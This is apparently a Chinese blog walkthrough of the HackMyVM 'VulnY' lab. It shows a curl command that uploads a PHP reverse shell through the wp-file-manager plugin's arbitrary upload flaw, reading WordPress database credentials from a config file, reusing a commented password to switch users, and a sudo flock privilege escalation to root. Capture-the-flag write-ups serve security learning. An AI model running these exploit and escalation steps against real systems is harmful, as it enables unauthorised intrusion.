lvzhouhang
0%

HackmyVM-VulnY

发表于 分类于
本文字数: 2.9k 阅读时长 ≈ 3 分钟

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.165  08:00:27:6c:16:9b       PCS Systemtechnik GmbH
192.168.31.187  a6:9b:e0:2d:30:9a       (Unknown: locally administered)
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 4 responded

ip为192.168.31.165 ,nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.165 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 00:19 EST
Nmap scan report for vulny (192.168.31.165)
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
33060/tcp open  mysqlx
MAC Address: 08:00:27:6C:16:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 28.56 seconds

开了一个mysql服务和http的服务

80端口

扫描目录能扫出来有一个secret的目录

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl http://192.168.31.165/secret/
Neither <b>/etc/wordpress/config-192.168.31.165.php</b> nor <b>/etc/wordpress/config-168.31.165.php</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username

提示了要去看/etc/wordpress/config-168.31.165.php,可以看出来这是一个wordpress的框架,wp-content存在目录遍历

Index of /secret/wp-content/uploads/2020/10这里能发现一个压缩包wp-file-manager-6.O.zip,这个插件存在任意文件上传

1
curl -F cmd=upload -F target=l1_ -F upload[]=@rev.php -XPOST "http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

上传一个反弹shell的文件

访问http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/files/rev.php

进行反弹shell

1
2
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

cd进/etc/wordpress,

1
2
3
www-data@vulny:/etc/wordpress$ ls
ls
config-192.168.1.122.php  htaccess

文件名和80端口的不一样,猜测可能是80端口是ip地址输出的文件名

1
2
3
4
5
6
7
8
9
10
www-data@vulny:/etc/wordpress$ cat c*
cat c*
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>

给了mysql的账号密码,这还有wordpress的路径,查看wp-config.php有一行注释很突出

1
/* idrinksomewater */

登录mysql,找不到有用的东西

查看/etc/passwd有一个adrian可以登录,注释就是密码

1
2
3
4
5
www-data@vulny:/usr/share/wordpress$ su adrian
su adrian
Password: idrinksomewater

adrian@vulny:/usr/share/wordpress$
1
2
3
4
5
6
7
8
adrian@vulny:/$ sudo -l
sudo -l
Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock
1
2
3
adrian@vulny:/$ sudo -u root /usr/bin/flock -u / /bin/bash
sudo -u root /usr/bin/flock -u / /bin/bash
root@vulny:/

提权成功